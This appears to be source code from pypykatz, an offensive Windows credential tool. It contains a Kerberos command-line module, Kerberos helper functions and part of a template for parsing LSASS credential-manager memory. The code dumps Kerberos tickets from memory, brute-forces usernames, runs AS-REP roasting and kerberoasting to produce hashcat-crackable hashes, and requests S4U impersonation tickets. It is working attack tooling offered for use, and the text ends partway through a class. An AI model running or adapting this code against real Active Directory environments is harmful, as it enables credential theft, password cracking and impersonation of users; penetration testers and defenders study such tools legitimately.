#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import os
import base64
import platform
import argparse
import asyncio
from pypykatz import logger
import traceback

from minikerberos.common.utils import print_table
from minikerberos.protocol.asn1_structs import KRB_CRED
from pypykatz.commons.filetime import filetime_to_dt
from pypykatz.commons.common import geterr
from pypykatz.kerberos.kerberos import get_TGS, get_TGT, generate_targets, \
	brute, asreproast, spnroast, s4u, process_keytab, list_ccache, \
	del_ccache, roast_ccache, ccache_to_kirbi, kirbi_to_ccache

from pypykatz.kerberos.kirbiutils import parse_kirbi, format_kirbi, print_kirbi
from msldap.commons.factory import LDAPConnectionFactory
from minikerberos.common.spn import KerberosSPN
from minikerberos.common.creds import KerberosCredential



"""
Kerberos is not part of pypykatz directly. 
This is a wrapper for minikerberos
"""

class KerberosCMDHelper:
	def __init__(self):
		self.live_keywords = ['kerberos']
		self.keywords = ['kerberos']
		
	@staticmethod
	def luid_converter(luid):
		if luid.startswith('0x') is True:
			luid = int(luid, 16)
		return int(luid)
	
	def add_args(self, parser, live_parser):
		live_subcommand_parser = argparse.ArgumentParser(add_help=False)
		live_kerberos_subparsers = live_subcommand_parser.add_subparsers(help = 'live_kerberos_module')
		live_kerberos_subparsers.required = True
		live_kerberos_subparsers.dest = 'live_kerberos_module'
		
		live_luid_parser = live_kerberos_subparsers.add_parser('currentluid', help = 'Prints out the LUID of the current user')

		live_roast_parser = live_kerberos_subparsers.add_parser('roast', help = 'Automatically run spnroast and asreproast')
		live_roast_parser.add_argument('-o','--out-file', help='Output file to store hashcat formatted tickets in')

		live_tgs_parser = live_kerberos_subparsers.add_parser('tgt', help = 'Request a TGT ticket. It may work better specifying the target as cifs/<domain.corp>')
		live_tgs_parser.add_argument('--target', help='SPN string of the service to request the ticket for')
		live_tgs_parser.add_argument('-o','--out-file', help='Output ccache file name')

		live_tgs_parser = live_kerberos_subparsers.add_parser('apreq', help = 'Request a APREQ ticket for a given service')
		live_tgs_parser.add_argument('target', help='SPN string of the service to request the ticket for')
		live_tgs_parser.add_argument('-o','--out-file', help='Output ccache file name')

		live_purge_parser = live_kerberos_subparsers.add_parser('purge', help = 'Purge all tickets. For the current user use --luid 0')
		live_purge_parser.add_argument('--luid', help='LUID of the user whose tickets to be purged. Use "0x" if you specify a hex value!')

		live_sessions_parser = live_kerberos_subparsers.add_parser('sessions', help = 'List user sessions. Needs elevated privileges.')

		live_export_parser = live_kerberos_subparsers.add_parser('dump', help = 'Fetches tickets for a given session or all sessions from memory and prints or exports them as .kirbi files')
		live_export_parser.add_argument('--luid', help='LUID of the user whose tickets to be exported. Use "0x" if you specify a hex value!')
		live_export_parser.add_argument('-o', '--outdir', help='path to kirbi directory')

		live_triage_parser = live_kerberos_subparsers.add_parser('triage', help = 'List tickets for a given session or all sessions')
		live_triage_parser.add_argument('--luid', help='LUID of the user whose tickets to be exported. Use "0x" if you specify a hex value!')
		
		live_parser.add_parser('kerberos', help = 'Kerberos related commands', parents=[live_subcommand_parser])

		#offline part
		#ccache part
		ccache_subcommand_parser = argparse.ArgumentParser(add_help=False)
		kerberos_ccache_subparsers = ccache_subcommand_parser.add_subparsers(help = 'ccache_command')
		kerberos_ccache_subparsers.required = True
		kerberos_ccache_subparsers.dest = 'ccache_module'

		ccache_list = kerberos_ccache_subparsers.add_parser('list', help = 'List ccache file contents')
		ccache_list.add_argument('ccachefile', help='path to CCACHE file')

		ccache_del = kerberos_ccache_subparsers.add_parser('del', help = 'Delete tickets from ccache file based on their order. To get the order user the list command.')
		ccache_del.add_argument('ccachefile', help='path to CCACHE file')
		ccache_del.add_argument('index', type=int, help='ticket index to delete')

		ccache_roast = kerberos_ccache_subparsers.add_parser('roast', help = 'Convert stored tickets to hashcat crackable format')
		ccache_roast.add_argument('ccachefile', help='path to CCACHE file')
		ccache_roast.add_argument('-o','--out-file', help='Output file to store hashcat formatted tickets in')

		ccache_kirbi = kerberos_ccache_subparsers.add_parser('loadkirbi', help = 'Add kirbi file to ccache file.')
		ccache_kirbi.add_argument('ccachefile', help='path to CCACHE file')
		ccache_kirbi.add_argument('kirbifile', help='path to kirbi file / directory')

		ccache_kirbi = kerberos_ccache_subparsers.add_parser('exportkirbi', help = 'Export tickets to kirbi files. One ticket per file.')
		ccache_kirbi.add_argument('ccachefile',help='path to CCACHE file')
		ccache_kirbi.add_argument('kirbidir', help='path to kirbi directory ')
		

		#kirbi
		kirbi_subcommand_parser = argparse.ArgumentParser(add_help=False)
		kerberos_kirbi_subparsers = kirbi_subcommand_parser.add_subparsers(help = 'kirbi_command')
		kerberos_kirbi_subparsers.required = True
		kerberos_kirbi_subparsers.dest = 'kirbi_module'

		kirbi_list = kerberos_kirbi_subparsers.add_parser('parse', help = 'Parse kirbi file and show the ticket')
		kirbi_list.add_argument('kirbifile', help='path to kirbi file')


		kerberos_group = parser.add_parser('kerberos', help='Kerberos related commands')
		kerberos_subparsers = kerberos_group.add_subparsers()
		kerberos_subparsers.required = True
		kerberos_subparsers.dest = 'kerberos_module'

		tgt_parser = kerberos_subparsers.add_parser('tgt', help = 'Fetches a TGT for a given user')
		tgt_parser.add_argument('url', help='user credentials in URL format. Example: "kerberos+password://TEST\\victim:Passw0rd!1@10.10.10.2"')
		tgt_parser.add_argument('-o','--out-file', help='Output file to store the TGT in. CCACHE format.')
		tgt_parser.add_argument('-e','--etype', type=int, default=None, help='Encryption type to be requested')

		tgs_parser = kerberos_subparsers.add_parser('tgs', help = 'Fetches a TGS for a given service/user')
		tgs_parser.add_argument('url', help='user credentials in URL format')
		tgs_parser.add_argument('spn', help='SPN string of the service to request the ticket for')
		tgs_parser.add_argument('-o','--out-file', help='Output file to store the TGT in. CCACHE format.')
		tgs_parser.add_argument('-e','--etype', type=int, default=None, help='Encryption type to be requested')

		brute_parser = kerberos_subparsers.add_parser('brute', help = 'Bruteforcing usernames')
		brute_parser.add_argument('-d','--domain', help='Domain name (realm). This overrides any other domain spec that the users might have.')
		brute_parser.add_argument('-o','--out-file', help='Output file to store the found usernames.')
		brute_parser.add_argument('-n','--show-negatives', action='store_true', help='Print failed enumerations')
		brute_parser.add_argument('address', help='Kerberos server IP/hostname')
		brute_parser.add_argument('targets', nargs='*', help = 'username or file with usernames(one per line). Must be in username@domain format, unless you specified --domain then only the username is needed.You can specify mutliple usernames or files separated by space')

		asreproast_parser = kerberos_subparsers.add_parser('asreproast', help='asreproast')
		asreproast_parser.add_argument('-l','--ldap', help='LDAP URL. Load targets via LDAP connection to the DC.')
		asreproast_parser.add_argument('-d','--domain', help='Domain name (realm). This overrides any other domain spec that the users might have.')
		asreproast_parser.add_argument('-e','--etype', type=int, default=23, help='Encryption type to be requested')
		asreproast_parser.add_argument('-o','--out-file', help='Output file to store the tickets in hashcat crackable format.')
		asreproast_parser.add_argument('address', help='Kerberos server IP/hostname')
		asreproast_parser.add_argument('-t', '--targets', nargs='*', help = 'username or file with usernames(one per line). Must be in username@domain format, unless you specified --domain then only the username is needed.You can specify mutliple usernames or files separated by space')

		spnroast_parser = kerberos_subparsers.add_parser('spnroast', help = 'kerberoast/spnroast')
		spnroast_parser.add_argument('-l','--ldap', help='LDAP URL. Load targets via LDAP connection to the DC.')
		spnroast_parser.add_argument('-d','--domain', help='Domain name (realm). This overrides any other domain spec that the users might have.')
		spnroast_parser.add_argument('-e','--etype', type=int, default=23, help='Encryption type to be requested')
		spnroast_parser.add_argument('-o','--out-file', help='Output file to store the tickets in hashcat crackable format.')
		spnroast_parser.add_argument('url', help='user credentials in Kerberos URL format')
		spnroast_parser.add_argument('-t', '--targets', nargs='*', help = 'username or file with usernames(one per line). Must be in username@domain format, unless you specified --domain then only the username is needed.You can specify mutliple usernames or files separated by space')

		s4u_parser = kerberos_subparsers.add_parser('s4u', help = 'Gets an S4U2proxy ticket impersonating given user')
		s4u_parser.add_argument('url', help='user credentials in URL format')
		s4u_parser.add_argument('spn', help='SPN string of the service to request the ticket for')
		s4u_parser.add_argument('targetuser', help='')
		s4u_parser.add_argument('-o','--out-file', help='Output file to store the TGT in. CCACHE format.')

		keytab_parser = kerberos_subparsers.add_parser('keytab', help = 'Parse keytab file, list secret key(s)')
		keytab_parser.add_argument('keytabfile', help='user credentials in URL format')

		ccache_parser = kerberos_subparsers.add_parser('ccache', help = 'Parse/Edit ccache file', parents=[ccache_subcommand_parser])
		kirbi_parser = kerberos_subparsers.add_parser('kirbi', help = 'Parse/Edit kirbi file', parents=[kirbi_subcommand_parser])
		
	def execute(self, args):
		if len(self.keywords) > 0 and args.command in self.keywords:
			self.run(args)
		
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			self.run_live(args)
			
			
	def run_live(self, args):
		if platform.system() != 'Windows':
			print('[-]This command only works on Windows!')
			return
		
		from pypykatz.kerberos.kerberoslive import KerberosLive, live_roast # , purge, list_sessions #get_tgt, get_tgs
		kl = KerberosLive()

		if args.live_kerberos_module == 'roast':
			res, errors, err = asyncio.run(live_roast(args.out_file))
			if err is not None:
				print('[LIVE][KERBEROS][ROAST] Error while roasting tickets! Reason: %s' % geterr(err))
				return
			if args.out_file is None:
				for r in res:
					print(r)

		elif args.live_kerberos_module == 'tgt':
			ticket = kl.get_tgt(args.target)
			if args.out_file is None:
				print_kirbi(ticket)
				return
			
			with open(args.out_file, 'wb') as f:
				f.write(ticket)

		elif args.live_kerberos_module == 'apreq':
			apreq, sessionkey = kl.get_apreq(args.target)
			print('APREQ b64: ')
			print(format_kirbi(apreq.dump()))
			print('Sessionkey b64: %s' % base64.b64encode(sessionkey).decode())		

		
		elif args.live_kerberos_module == 'currentluid':
			print(hex(kl.get_current_luid()))

		elif args.live_kerberos_module == 'purge':
			luid = None
			if args.luid is not None:
				luid = args.luid
				if luid.startswith('0x') is True:
					luid = int(luid, 16)
				luid=int(luid)
			
			kl.purge(luid)
			print('Tickets purged!')

		elif args.live_kerberos_module == 'sessions':
			kl.list_sessions()

		elif args.live_kerberos_module == 'triage':
			if args.luid is None:
				ticketinfos = kl.get_all_ticketinfo()
			else:
				luid = KerberosCMDHelper.luid_converter(args.luid)
				ticketinfos = kl.get_ticketinfo(luid)

			table = [['LUID', 'ServerName', 'RealmName', 'StartTime', 'EndTime', 'RenewTime', 'EncryptionType', 'TicketFlags']]
			for luid in ticketinfos:
				if len(ticketinfos[luid]) == 0:
					continue
				
				for ticket in ticketinfos[luid]:
					table.append([
						hex(luid), 
						ticket['ServerName'], 
						ticket['RealmName'], 
						filetime_to_dt(ticket['StartTime']).isoformat(), 
						filetime_to_dt(ticket['EndTime']).isoformat(), 
						filetime_to_dt(ticket['RenewTime']).isoformat(), 
						str(ticket['EncryptionType']), 
						str(ticket['TicketFlags'])
					])
				
			print_table(table)
			
		
		elif args.live_kerberos_module == 'dump':
			if args.luid is None:
				tickets = kl.export_all_ticketdata()
			else:
				luid = KerberosCMDHelper.luid_converter(args.luid)
				tickets = kl.export_ticketdata(luid)

			if args.outdir is not None:
				for luid in tickets:
					for ticket in tickets[luid]:
						try:
							pt = KRB_CRED.load(ticket['Ticket']).native
							name = '_'.join(pt['tickets'][0]['sname']['name-string'])
							name = hex(int(luid)) + '_' + '@'.join([name, pt['tickets'][0]['realm']])
						except:
							name = hex(int(luid)) + '_' + os.urandom(4).hex()
						with open(os.path.join(args.outdir, 'ticket_%s.kirbi' % name), 'wb') as f:
							f.write(ticket['Ticket'])

			else:
				for luid in tickets:
					if len(tickets[luid]) == 0:
						continue

					print('LUID @%s' % hex(luid))
					for ticket in tickets[luid]:
						print_kirbi(ticket['Ticket'])
		

	def run(self, args):

		if args.kerberos_module == 'tgt':
			kirbi, err = asyncio.run(get_TGT(args.url, override_etype = args.etype))
			if err is not None:
				print('[KERBEROS][TGT] Failed to fetch TGT! Reason: %s' % err)
				return
			
			if args.out_file is not None:
				with open(args.out_file, 'wb') as f:
					f.write(kirbi.dump())
			else:
				print_kirbi(kirbi)

		elif args.kerberos_module == 'tgs':
			tgs, encTGSRepPart, key, kirbi, err = asyncio.run(get_TGS(args.url, args.spn, override_etype = args.etype))
			if err is not None:
				print('[KERBEROS][TGS] Failed to fetch TGS! Reason: %s' % err)
				return

			if args.out_file is not None:
				with open(args.out_file, 'wb') as f:
					f.write(kirbi.dump())
			else:
				print_kirbi(kirbi)
		
		elif args.kerberos_module == 'brute':
			target_spns = generate_targets(args.targets, args.domain)
			_, err = asyncio.run(brute(args.address, target_spns, args.out_file, args.show_negatives))
			if err is not None:
				print('[KERBEROS][BRUTE] Error while enumerating users! Reason: %s' % geterr(err))
				return

		elif args.kerberos_module == 'asreproast':
			if args.ldap is None:
				target_spns = generate_targets(args.targets, args.domain, to_spn = False)
			else:
				target_spns, _ = asyncio.run(get_ldap_kerberos_targets(args.ldap, target_type = 'asrep'))
			_, err = asyncio.run(asreproast(args.address, target_spns, out_file = args.out_file, etype = args.etype))
			if err is not None:
				print('[KERBEROS][ASREPROAST] Error! Reason: %s' % geterr(err))
				return

		elif args.kerberos_module == 'spnroast':
			if args.ldap is None and args.targets is None:
				raise Exception('Either LDAP URL or targets must be provided')
			if args.ldap is None:
				target_spns = generate_targets(args.targets, args.domain, to_spn = True)
			else:
				_, target_spns = asyncio.run(get_ldap_kerberos_targets(args.ldap, target_type = 'spn'))
			_, err = asyncio.run(spnroast(args.url, target_spns, out_file = args.out_file, etype = args.etype))
			if err is not None:
				print('[KERBEROS][SPNROAST] Error! Reason: %s' % geterr(err))
				return

		elif args.kerberos_module == 's4u':
			tgs, encTGSRepPart, key, kirbi, err =  asyncio.run(s4u(args.url, args.spn, args.targetuser))
			if err is not None:
				print('[KERBEROS][S4U] Error! Reason: %s' % geterr(err))
				return
			
			if args.out_file is not None:
				with open(args.out_file, 'wb') as f:
					f.write(kirbi.dump())
			else:
				print_kirbi(kirbi)

		elif args.kerberos_module == 'keytab':
			process_keytab(args.keytabfile)

		elif args.kerberos_module == 'ccache':
			if args.ccache_module == 'list':
				list_ccache(args.ccachefile)
			elif args.ccache_module == 'roast':
				roast_ccache(args.ccachefile, args.out_file)
			elif args.ccache_module == 'del':
				del_ccache(args.ccachefile, args.index)
			elif args.ccache_module == 'exportkirbi':
				ccache_to_kirbi(args.ccachefile, args.kirbidir)
			elif args.ccache_module == 'loadkirbi':
				kirbi_to_ccache(args.ccachefile, args.kirbi)
		
		elif args.kerberos_module == 'kirbi':
			if args.kirbi_module == 'parse':
				parse_kirbi(args.kirbifile)


def get_ldap_url(authmethod = 'ntlm', host = None):
	from winacl.functions.highlevel import get_logon_info
	info = get_logon_info()

	logonserver = info['logonserver']
	if host is not None:
		logonserver = host

	return 'ldap+sspi-%s://%s\\%s@%s' % (authmethod, info['domain'], info['username'], logonserver)

async def get_ldap_kerberos_targets(ldap_url, target_type = 'all', authmethod = 'ntlm', host = None):
	if ldap_url == 'auto':
		ldap_url = get_ldap_url(authmethod = authmethod, host = host)
	
	msldap_url = LDAPConnectionFactory.from_url(ldap_url)
	client = msldap_url.get_client()
	_, err = await client.connect()
	if err is not None:
		raise err

	domain = client._ldapinfo.distinguishedName.replace('DC=','').replace(',','.')
	spn_users = []
	asrep_users = []

	if target_type == 'asrep' or target_type == 'all':
		async for user, err in client.get_all_knoreq_users():
			if err is not None:
				raise err
			cred = KerberosCredential()
			cred.username = user.sAMAccountName
			cred.domain = domain
				
			asrep_users.append(cred)
	
	if target_type == 'spn' or target_type == 'all':
		async for user, err in client.get_all_service_users():
			if err is not None:
				raise err
			cred = KerberosSPN()
			cred.username = user.sAMAccountName
			cred.domain = domain
				
			spn_users.append(cred)
	
	return asrep_users, spn_users



from pypykatz import logger
import os
import ntpath
import glob

from minikerberos.security import KerberosUserEnum, APREPRoast, Kerberoast
from minikerberos.common.url import KerberosClientURL
from minikerberos.common.spn import KerberosSPN
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.target import KerberosTarget
from minikerberos.common.keytab import Keytab
from minikerberos.aioclient import AIOKerberosClient
from minikerberos.common.utils import print_table
from minikerberos.common.ccache import CCACHE, Credential
from minikerberos.common.utils import tgt_to_kirbi


def process_target_line(target, realm = None, to_spn = True):
	spn = KerberosSPN()
	if to_spn is False:
		spn = KerberosCredential()
	line = target.strip()
	if line == '':
		return None
	m = line.find('@')
	if m == -1:
		if realm is not None:
			spn.username = line
			spn.domain = realm
		else:
			raise Exception('User %s is missing realm specification and no global realm is defined!' % line)
					
	else:
		spn.username, spn.domain = line.split('@',1)
		if realm is not None:
			spn.domain = realm

	return spn

def generate_targets(targets, realm = None, to_spn = True):
	"""
	Takes a list of files or strings and generates a list of targets in <username>@<realm> format
	"""
	for target in targets:
		target = target.strip()
		try:
			open(target, 'r')
		except:
			x = process_target_line(target, realm = realm, to_spn = to_spn)
			if x:
				yield x
		else:
			with open(target, 'r') as f:
				for line in f:
					x = process_target_line(line, realm = realm, to_spn = to_spn)
					if x:
						yield x

def process_keytab(keytablfile):
	with open(keytablfile, 'rb') as f:
		kt = Keytab.from_bytes(f.read())
		print(str(kt))

def list_ccache(ccachefile):
	cc = CCACHE.from_file(ccachefile)
	table = []
	table.append(['id'] + Credential.summary_header())
	i = 0
	for cred in cc.credentials:
		table.append([str(i)] + cred.summary())
		i += 1
	print()	#this line intentionally left blank
	print_table(table)

def roast_ccache(ccachefile, outfile = None):
	cc = CCACHE.from_file(ccachefile)
	if outfile:
		with open(outfile, 'wb') as f:
			for h in cc.get_hashes(all_hashes = True):
				f.write(h.encode() + b'\r\n')
	else:
		for h in cc.get_hashes(all_hashes = True):
			print(h)

def del_ccache(ccachefile, index):
	output_filename = os.path.join(os.path.dirname(os.path.abspath(ccachefile)), '%s.edited.ccache' % ntpath.basename(ccachefile)) #sorry for this, im tired now :(
	cc = CCACHE.from_file(ccachefile)
	temp_cc = CCACHE()
	temp_cc.file_format_version = cc.file_format_version
	temp_cc.headerlen = cc.headerlen
	temp_cc.headers = cc.headers
	temp_cc.primary_principal = cc.primary_principal

	for i, cred in enumerate(cc.credentials):
		if i == index:
			continue
			
		temp_cc.credentials.append(cred)

	logger.info('Writing edited file to %s' % output_filename)
	temp_cc.to_file(output_filename)

def ccache_to_kirbi(ccachefile, kirbidir):
	cc = CCACHE.from_file(ccachefile)
	logger.info('Extracting kirbi file(s)')
	cc.to_kirbidir(kirbidir)
	logger.info('Done!')

def kirbi_to_ccache(ccachefile, kirbi):
	try:
		cc = CCACHE.from_file(ccachefile)
	except FileNotFoundError:
		cc = CCACHE()
	
	abs_path = os.path.abspath(kirbi)
	if os.path.isdir(abs_path):
		logger.info('Parsing kirbi files in directory %s' % abs_path)
		for kirbifile in glob.glob(kirbi + '*.kirbi'):
			cc.add_kirbi(kirbifile)
	else:
		cc.add_kirbi(kirbi)
	
	cc.to_file(ccachefile)

async def get_TGS(url, spn, out_file = None, override_etype = None):
	try:
		logger.debug('[KERBEROS][TGS] started')
		if isinstance(override_etype, int):
			override_etype = [override_etype]

		ku = KerberosClientURL.from_url(url)
		cred = ku.get_creds()
		target = ku.get_target()
		spn = KerberosSPN.from_user_email(spn)

		logger.debug('[KERBEROS][TGS] target user: %s' % spn.get_formatted_pname())
		logger.debug('[KERBEROS][TGS] fetching TGT')
		kcomm = AIOKerberosClient(cred, target)
		await kcomm.get_TGT()
		logger.debug('[KERBEROS][TGS] fetching TGS')
		tgs, encTGSRepPart, key = await kcomm.get_TGS(spn, override_etype=override_etype)

		kirbi = tgt_to_kirbi(tgs, encTGSRepPart)
			
		if out_file is not None:
			with open(out_file, 'wb') as f:
				f.write(kirbi.dump())

		logger.debug('[KERBEROS][TGS] done!')
		return tgs, encTGSRepPart, key, kirbi, None
	except Exception as e:
		return None, None, None, None, e

async def get_TGT(url, override_etype = None):
	try:
		logger.debug('[KERBEROS][TGT] started')
		if isinstance(override_etype, int):
			override_etype = [override_etype]
		ku = KerberosClientURL.from_url(url)
		cred = ku.get_creds()
		target = ku.get_target()

		logger.debug('[KERBEROS][TGT] cred: %s' % cred)
		logger.debug('[KERBEROS][TGT] target: %s' % target)

		kcomm = AIOKerberosClient(cred, target)
		logger.debug('[KERBEROS][TGT] fetching TGT')
		await kcomm.get_TGT(override_etype=override_etype)
		
		kirbi = tgt_to_kirbi(kcomm.kerberos_TGT, kcomm.kerberos_TGT_encpart)

		return kirbi, None
	except Exception as e:
		return None, e

async def brute(host, targets, out_file = None, show_negatives = False):
	"""
	targets List<KerberosSPN>

	"""
	try:
		logger.debug('[KERBEROS][BRUTE] User enumeration starting')
		target = KerberosTarget(host)

		for spn in targets:
			ke = KerberosUserEnum(target, spn)
			
			result = await ke.run()
			if result is True:
				if out_file:
					with open(out_file, 'a') as f:
							f.write(result + '\r\n')
				else:
					print('[+] %s' % str(spn))
			else:
				if show_negatives is True:
					print('[-] %s' % str(spn))

		logger.info('[KERBEROS][BRUTE] User enumeration finished')
		return None, None
	except Exception as e:
		return None, e


async def asreproast(host, targets, out_file = None, etype = 23):
	"""
	targets List<KerberosSPN>

	"""
	try:
		logger.debug('[KERBEROS][ASREPROAST] Roasting...')
		logger.debug('[KERBEROS][ASREPROAST] Supporting the following encryption type: %s' % (str(etype)))

		ks = KerberosTarget(host)
		ar = APREPRoast(ks)
		hashes = []
		for target in targets:
			h = await ar.run(target, override_etype = [etype])
			hashes.append(h)

			if out_file:
				with open(out_file, 'a', newline = '') as f:
					for thash in hashes:
						f.write(thash + '\r\n')
			else:
				print(h)

		logger.info('[KERBEROS][ASREPROAST] Done!')
		return hashes, None
		
	except Exception as e:
		return None, e

async def spnroast(url, targets, out_file = None, etype = 23):
	"""
	targets List<KerberosSPN>

	"""
	try:
		logger.debug('[KERBEROS][SPNROAST] Roasting...')
		if etype:
			if etype == -1:
				etypes = [23, 17, 18]
			else:
				etypes = [etype]
		else:
			etypes = [23, 17, 18]

		logger.debug('[KERBEROS][SPNROAST] Using the following encryption type(s): %s' % (','.join(str(x) for x in etypes)))
		
		ku = KerberosClientURL.from_url(url)
		cred = ku.get_creds()
		target = ku.get_target()
		ar = Kerberoast(target, cred)
		hashes = await ar.run(targets, override_etype = etypes)

		if out_file:
			with open(out_file, 'w', newline = '') as f:
				for thash in hashes:
					f.write(thash + '\r\n')

		else:
			for thash in hashes:
				print(thash)

		logger.info('[KERBEROS][SPNROAST] Done!')
		return hashes, None
		
	except Exception as e:
		return None, e

async def s4u(url, spn, targetuser):
	try:
		logger.debug('[KERBEROS][S4U] Started')
		cu = KerberosClientURL.from_url(url)
		ccred = cu.get_creds()
		target = cu.get_target()

		service_spn = KerberosSPN.from_target_string(spn)
		target_user = KerberosSPN.from_user_email(targetuser)
			
		if not ccred.ccache:
			logger.debug('[KERBEROS][S4U] Getting TGT')
			client = AIOKerberosClient(ccred, target)
			await client.get_TGT()
			logger.debug('[KERBEROS][S4U] Getting ST')
			res = await client.getST(target_user, service_spn)
			tgs, encTGSRepPart, key = res
		else:
			logger.debug('[KERBEROS][S4U] Getting TGS via TGT from CCACHE')
			for tgt, key in ccred.ccache.get_all_tgt():
				try:
					logger.debug('[KERBEROS][S4U] Trying to get SPN with %s' % '!'.join(tgt['cname']['name-string']))
					client = AIOKerberosClient.from_tgt(target, tgt, key)

					res = await client.getST(target_user, service_spn)
					tgs, encTGSRepPart, key = res
					logger.debug('[KERBEROS][S4U] Sucsess!')
				except Exception as e:
					logger.debug('[KERBEROS][S4U] This ticket is not usable it seems Reason: %s' % e)
					continue
				else:
					break

		logger.debug('[KERBEROS][S4U] Done!')
		kirbi = tgt_to_kirbi(tgs, encTGSRepPart)
		return tgs, encTGSRepPart, key, kirbi, None

	except Exception as e:
		return None, None, None, None, e



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
from pypykatz.commons.common import hexdump
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild
from pypykatz.alsadecryptor.win_datatypes import LSA_UNICODE_STRING, ULONG, PVOID, PWSTR, POINTER, LIST_ENTRY
from pypykatz.alsadecryptor.package_commons import PackageTemplate

class CredmanTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Credman')
		self.signature = None
		self.first_entry_offset = None
		self.list_entry = None
		
	@staticmethod
	def get_template(sysinfo):
		template = CredmanTemplate()
		
		if sysinfo.architecture == KatzSystemArchitecture.X64:	
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_5
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_60
			else:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY
		else:
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_5_X86
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_60_X86
			else:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_X86
			
		template.log_template('list_entry', template.list_entry)

		return template
	
class PKIWI_CREDMAN_LIST_ENTRY_5_X86(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CREDMAN_LIST_ENTRY_5_X86()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CREDMAN_LIST_ENTRY_5_X86
		return p
		
class KIWI_CREDMAN_LIST_ENTRY_5_X86:
	def __init__(self):
		self.cbEncPassword = None
		self.encPassword = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.UserName = None
		self.cbUserName = None
		self.Flink = None
		self.Blink = None
		self.server1 = None
		self.unk6 = None
		self.unk7 = None
		self.user = None
		self.unk8 = None
		self.server2 = None
	
	@staticmethod
	async def load(reader):
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		res = KIWI_CREDMAN_LIST_ENTRY_5_X86()
		await reader.move(reader.tell() - 32)
		await reader.align() #not sure if it's needed here
		#
		res.cbEncPassword = await ULONG.loadvalue(reader)
		await reader.align()
		res.encPassword =await PWSTR.load(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await PVOID.load(reader)
		res.unk3 = await PVOID.load(reader)
		res.UserName =await PWSTR.load(reader)
		res.cbUserName = await ULONG.loadvalue(reader)
		await reader.align()
		res.Flink = await PKIWI_CREDMAN_LIST_ENTRY_5.load(reader)
		res.Blink = await PKIWI_CREDMAN_LIST_ENTRY_5.load(reader)
		res.server1 =await LSA_UNICODE_STRING.load(reader)
		res.unk6 = await PVOID.load(reader)
		res.unk7 = await PVOID.load(reader)
		res.user =await LSA_UNICODE_STRING.load(reader)
		res.unk8 = await ULONG.loadvalue(reader)
		await reader.align()
		res.server2 = await LSA_UNICODE_STRING.load(reader)
		return res
	
class PKIWI_CREDMAN_LIST_ENTRY_60_X86(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CREDMAN_LIST_ENTRY_60_X86()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CREDMAN_LIST_ENTRY_60_X86
		return p

class KIWI_CREDMAN_LIST_ENTRY_60_X86:
	def __init__(self):
		self.cbEncPassword = None
		self.encPassword = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.UserName = None
		self.cbUserName = None
		self.Flink = None
		self.Blink = None
		self.type = None
		self.unk5 = None
		self.server1 = None
		self.unk6 = None
		self.unk7 = None
		self.unk8 = None
		self.unk9 = None
		self.unk10 = None
		self.user = None
		self.unk11 = None
		self.server2 = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_CREDMAN_LIST_ENTRY_60_X86()
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		await reader.move(reader.tell() - 32)
		await reader.align() #not sure if it's needed here
		res.cbEncPassword = await ULONG.loadvalue(reader)
		await reader.align()
		res.encPassword =await PWSTR.load(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await PVOID.load(reader)
		res.unk3 = await PVOID.load(reader)
		res.UserName =await PWSTR.load(reader)
		res.cbUserName = await ULONG.loadvalue(reader)
		await reader.align()
		res.Flink = await PKIWI_CREDMAN_LIST_ENTRY_60.load(reader)
		res.Blink = await PKIWI_CREDMAN_LIST_ENTRY_60.load(reader)
		res.type = await LSA_UNICODE_STRING.load(reader)
		res.unk5 = await PVOID.load(reader)
		res.server1 =await LSA_UNICODE_STRING.load(reader)
		res.unk6 = await PVOID.load(reader)
		res.unk7 = await PVOID.load(reader)
		res.unk8 = await PVOID.load(reader)
		res.unk9 = await PVOID.load(reader)
		res.unk10 = await PVOID.load(reader)
		res.user =await LSA_UNICODE_STRING.load(reader)
		res.unk11 = await ULONG.loadvalue(reader)
		await reader.align()
		res.server2 =await LSA_UNICODE_STRING.load(reader)
		return res
	
class PKIWI_CREDMAN_LIST_ENTRY_X86(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CREDMAN_LIST_ENTRY_X86()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CREDMAN_LIST_ENTRY_X86
		return p
		
class KIWI_CREDMAN_LIST_ENTRY_X86:
	def __init__(self):
		self.cbEncPassword = None
		self.encPassword = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.UserName = None
		self.cbUserName = None
		self.Flink = None
		self.Blink = None
